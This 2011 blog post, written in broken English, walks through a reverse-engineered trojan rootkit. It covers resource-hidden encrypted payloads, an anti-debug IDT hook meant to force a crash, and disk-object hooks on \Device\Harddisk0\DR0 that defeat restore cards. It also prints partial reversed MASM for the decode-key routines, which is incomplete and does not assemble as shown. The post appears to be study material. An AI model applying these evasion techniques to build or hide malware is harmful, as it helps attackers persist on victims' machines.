Tuesday, October 4, 2011

Learn and study Rootkit Specials 2: kernel hook - object hook(1)


Today will begin practical rootkit. The article talk object hook.

The article root in Backdoor Tyojan code of reverse, I only post applied part some time ago, I am not post kernel part for don't used in. But if learn, There is use rootkit that is  superduper example to learn. So I use it to first learn  rootkit. I hope to don't use code to other.

To the rootkit, Break restore is a part of function, Wonderful part isn't here, but imformation encryption and hide and anti-debugger oneself. After Reverse analyse, Author is good bitterness work hard, If the code use in the right direction, Will benefit many people......

First hide imformation bright spot: Rootkit as an resource hide on program of  user module.
Second hide imformation bright spot: The user program code as an preface of generate secret key, That can effectively prevent after reverse, imformation of hide is flawed, Because only after reverse to generate code is full same original author code, Do this can open deep hide link of downloader and code.

Third hide imformation bright spot: Use a fixed key, Generate array by 1024 secret key component, Then use the secret key array operate with user code, finaly generate 4 bytes decode key.
Use decode key, find to hide dirty bad thing on its resourse form driver of load to memory. and finaly full clear trace.
Four hide imformation bright spot: Modify idt 0e mark break, let it point a invalid address to BSOD when debug, Do this can anti-debug.

These bright spot only is on rootkit, As an part of user code have many bright spot, Because already post the code some time ago, Everyone refer to finde its bright spot. OK, joking apart.

Principle of break through restore card: Use object hook on here.

1. IRP_MJ_CREATE routine is used to get disc disk device object, Call IoGetDeviceObjectPointer function to get "\\Device\\Harddisk0\\DR0" - the name of device object, and detect device whether have other device articulated, If have to save the device and wipe off the articulated.

2. Recover addition of DR0  on IRP_MJ_CLOSE, Do this must come and go without a trace.

Ok, Let us watch reverse code:
.model flat, stdcall
option casemap:none

include pcihdd.inc

  aDevicePhysical  db '\Device\PhysicalHardDisk0',0
  aDosdevicesPhys  db '\DosDevices\PhysicalHardDisk0',0
  SourceString db  '\Device\Harddisk0\DR0',0
  g_DeviceObject dd  0
  g_AttachedDevice dd  0
  DecodeKey dd  1024 dup (0)
  DecodeKEY dd  0
  P dd 0
  NumberOfBytes dd 0
  IDTData db 6 dup(0)
  Format db '%08X',0


; Generate a decode secret key array
CreateDecodeKey proc
  jmp  short $+2 ;junk instruction
  mov  ecx, 100h
  mov  edx, 0CCECC9B1h  ;KEY
  lea  eax, [ecx-1]
  push  ecx
  mov  ecx, 8
  shr  eax, 1
  jnb  ContinueLoop
  xor  eax, edx
  dec  ecx
  jnz  InLoop
  pop  ecx
  mov  DecodeKey[ecx*4], eax ;Save decode secret key array
  dec  ecx
  jnz  OutLoop
CreateDecodeKey endp

; Use mode import full code operate with above generation decode secret key, finaly generate decode key
; Decode key will be used to decode content of driver resource, After decode Resource feed back to user .(Watch start)
DecodeInputData proc  near
  jmp  short $+2 ;junk instruction
  mov  eax, 0FFFFFFFFh
  or  ebx, ebx   ;Judge IRP.AssociatedIrp.SystemBuffer whether is null
  jz  Quit
  mov  dl, [ebx]
  xor  dl, al
  movzx  edx, dl
  shr  eax, 8
  xor  eax, DecodeKey[edx*4]
  inc  ebx
  dec  ecx
  jnz  @B
  not  eax
DecodeInputData endp

No comments:

Post a Comment